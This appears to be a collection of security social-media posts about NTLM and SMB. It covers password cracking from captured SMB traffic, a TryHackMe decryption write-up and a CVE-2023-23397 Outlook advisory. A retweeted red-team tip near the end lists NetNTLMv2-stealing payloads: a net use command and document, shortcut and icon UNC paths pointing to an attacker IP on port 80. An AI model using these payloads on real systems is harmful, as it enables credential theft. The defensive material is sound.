One example why to use strong #passwords for users who use file sharing over #SMB even when the file transfers are #encrypted.
If the SMB traffic is captured/eavesdropped, then the attacker can try to crack the user password.
The attacker is able to extract challenge/response values from the Session Setup and then use #passwordcracking tools such as #hashcat

If the attack is successful, the attacker will gain not only the access to the user account, but it is also possible to decrypt the captured SMB file transfers. There is lack of perfect forward secrecy in this encryption.

For more details and practical examples, see this blog post:

https://malwarelab.eu/posts/tryhackme-smb-decryption/

#networktrafficanalysis #networktraffic #encryption #netntlmv2 #netntlm #ntlm #windows #fileshare #pentesting #cybersecurity #hardening #password #cracking #offensivesecurity #offsec #blueteam #purpleteam

SMB Decryption - TryHackMe :: MWLab — Ladislav's Malware Lab

Recent TryHackMe room called “Block” inspired me to create this write-up. The task is to decrypt SMB3-encrypted communication. It turned out that sometimes we only need the captured network traffic to fulfill this task, while otherwise we need some additional info, such as user’s password or its NTLM hash. In this blog post, I would like to summarize three different approaches with practical hands-on exercises based on TryHackMe challenge. I will demonstrate methods of SMB decryption with the knowledge of the user’s password, its NTLM hash, and without any password/hash, just from the captured traffic only.

SMB Decryption - TryHackMe

🚨#CVE-2023-23397 is a new vulnerability in Microsoft #Outlook leading to an Elevation of Privilege through collecting #NetNTLMv2 hashes. Crafted Exchange messaging items (Mail, Calendar, Tasks) may contain a UNC path in the PidLidReminderFileParameter property.
Patch now!

Microsoft released a #Powershell script to check onPrem and Cloud Exchange instances for malicious message items: https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-23397

According to @BleepinComputer
MSFT identified #APT28 exploiting this vuln before: https://bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-zero-day-used-by-russian-hackers-since-april-2022/

For more details on the exploit check out the write-up by MDSec below ⬇️
https://twitter.com/MDSecLabs/status/1635791863478091778

#infosec #cybersecurity #blueteam

CVE-2023-23397 script - Microsoft - CSS-Exchange

RT @[email protected]

Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\t
or pdf : /F (\\\\IP@80\\t)
or dubdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
or: IconFile=\\IP@80\t.ico

#RedTeam #NTLM cc @[email protected]

🐦🔗: https://twitter.com/mynameisv__/status/1123256857072742400

V on Twitter

“Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\t or pdf : /F (\\\\IP@80\\t) or dubdoc : ///IP@80/t or doc: Target="file://IP@80/t.dotx" or lnk: URL=file://IP@80/t.htm or: IconFile=\\IP@80\t.ico #RedTeam #NTLM cc @ddouhine”

Twitter